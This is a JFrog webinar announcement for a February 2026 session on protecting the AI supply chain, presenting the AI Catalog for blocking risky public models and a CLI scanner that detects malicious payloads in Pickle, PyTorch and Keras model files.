Securing AI Models: From Public Repos to Custom Built Models

February 3rd, 2026 | 8 AM PST | 5 PM CET

 

February 3rd, 2026

8 AM PST | 5 PM CET

 

As organizations race to adopt AI, the gap between rapid model usage and robust security is widening. Data scientists are frequently downloading and running opaque binary files locally, risking Remote Code Execution (RCE), while platform teams struggle to govern which models actually make it into production.

This technical spotlight session will demonstrate a unified approach to protecting your AI supply chain. We’ll start with the JFrog AI Catalog, showing how you can use it to identify and block dangerous public models (like those from Hugging Face) from entering your organization.

Then, we’ll dive into our latest release: the 1st Party AI Malicious Model Scanner. Through a live demo, we will show you how to close the loop between local development and global governance:

  • Scan Locally: Use the jf malicious-scan CLI command to detect malicious payloads (in Pickle, PyTorch, Keras, etc.) on your local machine before loading them.
  • Log & Centralize: See how to take a verified clean model and log it directly into the AI Catalog.

What You'll Learn:

  • Spot Threats Early: Identify RCE attempts and malicious logic in local binaries with clear evidence logs.
  • Bridge the Gap: Connect local data science workflows with enterprise security policies.
  • Automate Protection: Block risky models at the gateway and prevent them from polluting your supply chain.
  • Manage the Lifecycle: Track models from a local CLI scan all the way to a governed release in the catalog.

 

Presenter Information

 
 
 

Rami Pinku

Senior Product Manager, ML

 

Rami Pinku | Senior Product Manager, ML

 


 
 

Ariel Antoni

Senior Product Manager, Security

 

Ariel Antoni | Senior Product Manager, Security

 


 
 
 
 
 
 
JFrog Facebook
 
 
YouTube
 
 
JFrog LinkedIn
 
 
JFrog Twitter
 

Terms of Use | Privacy Notice | Read Our Blog | Start for Free | Contact Us

 

© 2026 Copyright JFrog Inc. All rights reserved.

 

© 2026 Copyright JFrog Inc

All rights reserved.

Terms of Use

Privacy Notice

Read Our Blog

Start for Free

Contact Us